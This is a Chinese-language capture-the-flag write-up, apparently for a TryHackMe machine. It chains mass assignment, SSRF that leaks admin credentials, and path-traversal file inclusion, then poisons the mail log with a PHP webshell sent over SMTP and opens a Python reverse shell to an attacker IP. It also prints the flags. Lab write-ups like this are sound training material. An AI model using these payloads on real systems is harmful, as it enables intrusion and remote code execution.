题目
"Even if it's not accessible from the browser, can you still find a way to capture the flags and sneak into the secret admin panel?"
“即使浏览器无法访问,你还能找到办法捕获旗帜并潜入秘密管理员面板吗?”
信息收集
扫端口
nmap -p- 10.80.189.83PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0) 25/tcp open smtp Postfix smtpd |_smtp-commands: mail.filepath.lab, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, CHUNKING, | ssl-cert: Subject: commonName=ip-10-10-31-82.eu-west-1.compute.internal | Subject Alternative Name: DNS:ip-10-10-31-82.eu-west-1.compute.internal | Not valid before: 2021-11-10T16:53:34 |_Not valid after: 2031-11-08T16:53:34 |_ssl-date: TLS randomness does not represent time 110/tcp open pop3 Dovecot pop3d |_pop3-capabilities: UIDL SASL TOP STLS AUTH-RESP-CODE CAPA RESP-CODES PIPELINING | ssl-cert: Subject: commonName=ip-10-10-31-82.eu-west-1.compute.internal | Subject Alternative Name: DNS:ip-10-10-31-82.eu-west-1.compute.internal | Not valid before: 2021-11-10T16:53:34 |_Not valid after: 2031-11-08T16:53:34 143/tcp open imap Dovecot imapd (Ubuntu) |_imap-capabilities: SASL-IR ENABLE more IMAP4rev1 post-login ID LOGINDISABLEDA0001 Pre-login OK capabilities IDLE listed STARTTLS LITERAL+ have LOGIN-REFERRALS | ssl-cert: Subject: commonName=ip-10-10-31-82.eu-west-1.compute.internal | Subject Alternative Name: DNS:ip-10-10-31-82.eu-west-1.compute.internal | Not valid before: 2021-11-10T16:53:34 |_Not valid after: 2031-11-08T16:53:34 993/tcp open ssl/imap Dovecot imapd (Ubuntu) |_imap-capabilities: SASL-IR ENABLE more AUTH=PLAIN post-login ID AUTH=LOGINA0001 Pre-login OK IMAP4rev1 IDLE listed capabilities LITERAL+ have LOGIN-REFERRALS | ssl-cert: Subject: commonName=ip-10-10-31-82.eu-west-1.compute.internal | Subject Alternative Name: DNS:ip-10-10-31-82.eu-west-1.compute.internal | Not valid before: 2021-11-10T16:53:34 |_Not valid after: 2031-11-08T16:53:34 995/tcp open ssl/pop3 Dovecot pop3d |_pop3-capabilities: UIDL SASL(PLAIN LOGIN) TOP USER AUTH-RESP-CODE CAPA RESP-CODES PIPELINING | ssl-cert: Subject: commonName=ip-10-10-31-82.eu-west-1.compute.internal | Subject Alternative Name: DNS:ip-10-10-31-82.eu-west-1.compute.internal | Not valid before: 2021-11-10T16:53:34 |_Not valid after: 2031-11-08T16:53:34 4000/tcp open http Node.js (Express middleware) |_http-title: Sign In 50000/tcp open http Apache httpd 2.4.41 ((Ubuntu)) | http-cookie-flags: | /: | PHPSESSID: |_ httponly flag not set |_http-server-header: Apache/2.4.41 (Ubuntu) |_http-title: System Monitoring Portal Service Info: Host: mail.filepath.lab; OS: Linux; CPE: cpe:/o:linux:linux_kernelflag1
在4000端口找到如下
在端口50000下找到如下页面
这里是一个Sysmon系统页面,里面有一句话如下
Note: This website is intended for authorized personnel only. Be advised that every action and request within this system is subject to monitoring and logging. Unauthorized access or misuse of this portal will be addressed in accordance with company policies and applicable laws.还有一个登录页面
跑一下目录。4000没有跑出来东西
50000也没啥东西
回到4000端口,我们刚进来的时候直接就是登录页面
刚发现之前没注意的游客账户的账户密码,尴尬了
登录一下
逛了一圈,在查看个人资料这里看到一个线索,isAdmin!
下面有一个功能点
这里推荐的东西会出现在上面
那我们猜测一下应该也可以对里面的参数进行修改!
尝试修改名字
可以修改!
那修改isadmin
多了一个API的功能!
访问看了一下,结果如下
我们整理一下数据
Internal API GET http://127.0.0.1:5000/internal-api HTTP/1.1 Host: 127.0.0.1:5000 Response: { "secretKey": "superSecretKey123", "confidentialInfo": "This is very confidential." } Get Admins API GET http://127.0.0.1:5000/getAllAdmins101099991 HTTP/1.1 Host: 127.0.0.1:5000 Response: { "ReviewAppUsername": "admin", "ReviewAppPassword": "xxxxxx", "SysMonAppUsername": "administrator", "SysMonAppPassword": "xxxxxxxxx", }这里看到,想要进入5000端口需要使用本机IP发送请求。
在我们更改isAdmin后,在settings的位置可以看到如下也页面
很明显这里就是让我们做ssrf请求的位置!
将接口http://127.0.0.1:5000/internal-api放到里面!
发送后结果如下
这里看到base64,应该是base64解码
eyJzZWNyZXRLZXkiOiJzdXBlclNlY3JldEtleTEyMyIsImNvbmZpZGVudGlhbEluZm8iOiJUaGlzIGlzIHZlcnkgY29uZmlkZW50aWFsIGluZm9ybWF0aW9uLiBIYW5kbGUgd2l0aCBjYXJlLiJ9 解码后 {"secretKey":"superSecretKey123","confidentialInfo":"This is very confidential information. Handle with care."}这里推断出,每次发送ssrf之后,都会把结果以 base64 编码的形式发送到/admin/settings 页面
发送我们获取的admin的API接口!
http://127.0.0.1:5000/getAllAdmins101099991 结果:eyJSZXZpZXdBcHBVc2VybmFtZSI6ImFkbWluIiwiUmV2aWV3QXBwUGFzc3dvcmQiOiJhZG1pbkAhISEiLCJTeXNNb25BcHBVc2VybmFtZSI6ImFkbWluaXN0cmF0b3IiLCJTeXNNb25BcHBQYXNzd29yZCI6IlMkOSRxazZkIyoqTFFVIn0= 解码后: {"ReviewAppUsername":"admin","ReviewAppPassword":"admin@!!!","SysMonAppUsername":"administrator","SysMonAppPassword":"S$9$qk6d#**LQU"}成功拿到SysMonApp的管理员密码!以及ReviewAp的管理员密码!
ReviewAppUsername:admin ReviewAppPassword:admin@!!! SysMonAppUsername:administrator SysMonAppPassword:S$9$qk6d#**LQU登录50000页面
拿到flag1
THM{!50_55Rf_1S_d_k3Y??!}flag2
继续逛,这里找了很多地方,最后在网站源码中看到一个可疑点,注意这里的profile.php!
尝试访问了一下,结果如下,有戏!,既然这里没有直接解析成图片,那说不定可以进行本地文件读取
这里尝试了很多方式,最后找到了绕过方式payload如下
....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//etc/passwd这里看了一下passwd文件,发现了两个用户
joshua charles尝试读取私钥,果然不行
整理一下思路,通过4000打到50000,现在手机有一个本地文件包含。但貌似做了一些限制。本地文件包含不是经常配合文件上传的图片马等漏洞做配合吗!!!。更改这么多协议,会不会是让我们包含日志!
尝试读取一下上面哪些协议的日志
先看22的
http://10.80.189.83:50000/profile.php?img=....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//var/log/auth.log邮服的
http://10.80.189.83:50000/profile.php?img=....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//var/log/mail.log尝试 ssh的写马能不能实现
不行,做了限制。日志没有记录
换邮服的
nc连一下
nc -nv 10.80.189.83 25尝试写马
HELO attacker.com MAIL FROM:<test@test.com> RCPT TO:<?php system($_GET['cmd']); ?> DATA Subject: Test Log Injection This is a test. . QUIT看一下日志
http://10.80.189.83:50000/profile.php?img=....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//var/log/mail.log&cmd=id读取成功!!
这里尝试反弹shell
攻击主机IP: nc -lvnp 4444这里试了几个反弹shell,最后通过python反弹过来了
python3 -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.80.103.9",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/bash")'这下面有一个贼长的文件。拿到最后的flag
THM{505eb0fb8a9f32853b4d955e1f9123ea}
